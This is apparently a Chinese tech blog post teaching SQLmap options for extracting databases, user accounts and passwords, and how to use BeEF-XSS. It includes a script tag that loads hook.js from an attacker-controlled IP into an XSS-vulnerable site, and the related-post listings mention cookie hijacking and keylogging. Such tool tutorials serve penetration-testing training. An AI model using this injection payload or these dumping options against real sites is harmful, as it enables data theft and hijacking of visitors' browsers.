SQLmap和Beef工具使用教程

已于 2024-07-08 13:36:46 修改
阅读量585 收藏 3
点赞数 8
分类专栏: 工具使用 文章标签: 网络安全
于 2024-07-08 11:32:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44512510/article/details/140259990
版权

SQLmap使用

SQLmap 是一个开源的自动化SQL注入工具,能够自动检测目标URL的SQL注入漏洞,并通过注入SQL语句获取数据库信息,如数据库结构、表数据、用户凭据等

  • SQLmap使用格式一般为:

sqlmap [-option] [-url]


  • 相关参数作用:
参数作用
-u指定url(注入点),返回注入类型和使用的数据库信息
-b获取数据库版本
-a获取所有内容
-m对文件内的所有url进行扫描
-D指定目标数据库,单/双引号包裹,组合使用
-T指定目标表,单/双引号包裹,组合使用
-C指定目标字段,胆/双引号包裹,组合使用
–cookie指定cookie的值,单/双引号包裹
–current-db获取当前使用的数据库
–current-user获取当前登录的用户
–users获取所有用户名
–passwords获取所有用户名的密码
–privileges查看每个数据库成员的权限
–is-dba判断当前用户是否为数据库的管理员
–hostname获取服务器的主机名
–dbs获取所有数据库
–table获取所有表
–columns获取所有字段(只指定库名不指定表名会报错)
–dump获取表中的信息
–search搜索数据库中的库/表/字段
–tamper指定绕过的脚本

Beef-XSS使用

Beef-XSS是一款开源的浏览器漏洞利用框架,专门用于Web浏览器的安全测试。它通过钓鱼链接或恶意代码将目标浏览器挂钩到框架中,允许测试人员执行各种攻击脚本,分析和利用浏览器及其插件中的安全漏洞,从而帮助评估和提升Web应用的安全性

  • 打开beef工具,第一次启动会有设置密码,输入命令后会自动跳转到网页中进行登录
sudo beef-xss

在这里插入图片描述


  • 在有XSS漏洞的网站插入下面的内容,启用beef工具
<script src="http://<IP>:3000/hook.js"></script>	//其中IP填写kali机的地址

在这里插入图片描述


  • 之后就可以在beef工具的ui界面查看到网站的相关信息

在这里插入图片描述


  • 使用Commands模块对网页进行操作

在这里插入图片描述


  • Commands中的提示

在这里插入图片描述

  绿色:攻击可执行,且用户不可视
  橙色:攻击可执行,但用户可视
  灰色:攻击未确认
  攻击不可执行

Wrop
关注
专栏目录
【愚公系列】2023年06月 网络安全高级班 025.HW护网行动攻防演练介绍和工具
时光隧道
05-12 9782
HW护网行动攻防演练是一种针对网络安全的实践活动,用于测试和提高组织的网络安全防御和攻击能力。通过模拟真实的网络攻击和防御行动,演练参与者在紧张压力下的反应和解决问题的能力,发现网络安全漏洞和提高安全意识,加强网络安全防御能力。攻防演练的成员组成一般包括攻击者、防御者和观察者三个角色。攻击者的任务是模拟真实的黑客攻击,找出系统的漏洞并利用其进行攻击,以检验系统的安全性。防御者则负责发现和修补漏洞,并保护系统不受攻击。观察者则负责记录和分析整个攻防过程,并提供建议和改进意见。
漏洞扫描(kali beef-xss、DNSlog、CSRF、SSRF)
m0_61506558的博客
08-04 1676
并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口 探测、攻击内网网站等危害。,'.yourid.ceye.io/jinyiuxin'))),1,0) 黑体处拼接SQL语句。gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代。第三方网站利用被攻击网站生效的cookie,直接对服务器接口发起请求。抓取正常通信请求的数据包,再请求一次。.........
Kali中Beef使用教程
weixin_43287317的博客
04-02 5386
Kali中Beef使用教程
Beefxss使用教程图文教程(超详细)
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
dzqxwzoe的博客
08-21 1042
✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
beef的简单使用
weixin_44940180的博客
07-23 3595
beef Beef主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行 Beef服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器) Beef一般和
BeEF的基本操作
Kali与编程
12-19 1260
注入BeEF的目标是渗透测试人员在评估目标系统安全性时的重要步骤,它允许渗透测试人员模拟真实的攻击场景,并发现目标系统中存在的漏洞和弱点。一旦注入成功,你可以通过BeEF的Web界面与目标浏览器进行交互,并执行更多的攻击,如获取敏感信息、执行远程代码等。BeEF是一个强大的工具,它可以利用浏览器的漏洞和弱点,实现对目标系统的攻击。例如,你可以使用BeEF的会话劫持功能,将被攻击的浏览器会话重定向到一个伪造的登录页面。请注意,本文仅介绍了注入BeEF的目标的方法和示例,以便加深对该工具的理解。
beef的简单使用–结合中间人攻击注入钩子
超人学飞的日子
08-09 6803
    最近接触到了beef这款工具,看过基本教程后就自己进行了一次攻击尝试。 总体思路就是在内网下通过arp欺骗,修改response包,加入我们的钩子,十分简单。 首先是arp欺骗,这里用的是bettercap,可以参考我之前的文章。 开始arp欺骗:arp.spoof on 打开http代理:http.proxy on 下面我们要写一个js文件用于处理返回的response包,...
Kali Linux 工具使用中文说明书
dechen6073的博客
11-28 3414
From:https://www.hackfun.org/kali-tools/kali-tools-zh.html 英文版地址:http://tools.kali.org/ 信息收集 acccheck ace-voip Amap Automater bing-ip2hosts braa CaseFile CDPSnarf cisco-...
网安工具 | Windows便携式渗透测试环境PentestBox入门到进阶使用指南
WeiyiGeek 唯一极客IT知识分享
09-26 515
描述: PentestBox是一个基于Windows的便携式渗透测试环境, 它基于ConEmu 和 cmder进行设计的。它包含了许多常用的渗透测试工具和应用程序,如等。PentestBox的设计初衷是为了方便渗透测试人员在Windows系统上进行测试,无需进行复杂的安装和配置。它可以直接从USB驱动器或其他便携设备上运行,而不会对主机系统产生任何影响, PentestBox还提供了图形用户界面,使得渗透测试工作更加简单和直观。
Kali Linux漏洞利用工具集目录v2018.2大学霸陆小马功钟浩.pdf
09-14
本文件主要讲述Kali Linux系统中漏洞利用阶段可能用到的工具集合,内容涉及到的工具包括但不限于Armitage、BeEFSQLmap,以及如何使用这些工具进行漏洞挖掘和攻击演示。 首先提到的是Armitage工具。Armitage是一个...
如何使用 BeEF 黑客工具(非常详细),零基础入门到精通,看这一篇就够了
最新发布
分享Python知识
10-26 1128
如何使用 BeEF 黑客工具(非常详细),零基础入门到精通,看这一篇就够了
【渗透测试工具beef】XSS渗透测试工具beef如何安装使用?
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
04-25 7487
目录 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 .
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Beef工具使用
热门推荐
wo41ge的博客
02-22 1万+
今天写一下这个工具Beef 我这里用kali 启动Apache:service apache2 start 然后安装Beef工具 我用脚本安装 命令: apt-get update apt-get install beef-xss apt-get install beef-xss beef-xss 启动之后 Hook: <script src="http://<IP>:3000/hook.js"></script> 会弹出来beef的登录窗口 这边我们在看一下bee
XSS 工具beef
weixin_47306547的博客
09-25 796
beef介绍 XSS 漏洞的利用平台,kali 自带 beef 的启动 Kali 中 工具目录 /usr/share/beef-xss 配置文件 config.yaml 启动 beef 工具的方法 1)beef-xss 2) /usr/share/beef-xss/beef 注:在启动前需要修改默认用户...
一个好玩的工具BeEF介绍
luluoluoa的博客
05-07 1889
beef BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能 BeEF-XSS可以说是最强大的XSS漏洞利用工具,可以收集浏览器信息、键盘记录、社会工程等 总之就是使用beef这个工具来利用xss漏洞的 beef安装 我在kail虚拟机上安装的,很简单的在终端输入一句命令sudo apt setup beef-xss,然后安装成功设置密码就行了,因为之后在浏览器打开需要登陆,登陆名beef,密码就是安装时设置的那个 beef打开 在终端输入命令beef
kali-beef工具(xss-stored)
Vincent0sen的博客
09-06 531
kali工具beef-xss
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 4295
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
SQL注入自动化工具sqlmap使用教程
在使用sqlmap时,用户可以通过命令行界面进行操作,该工具提供了丰富的选项和开关,用于定制扫描过程。例如,用户可以指定目标URL、使用的测试技术(如布尔测试、时间测试、错误测试、联合查询、堆叠查询等)、测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值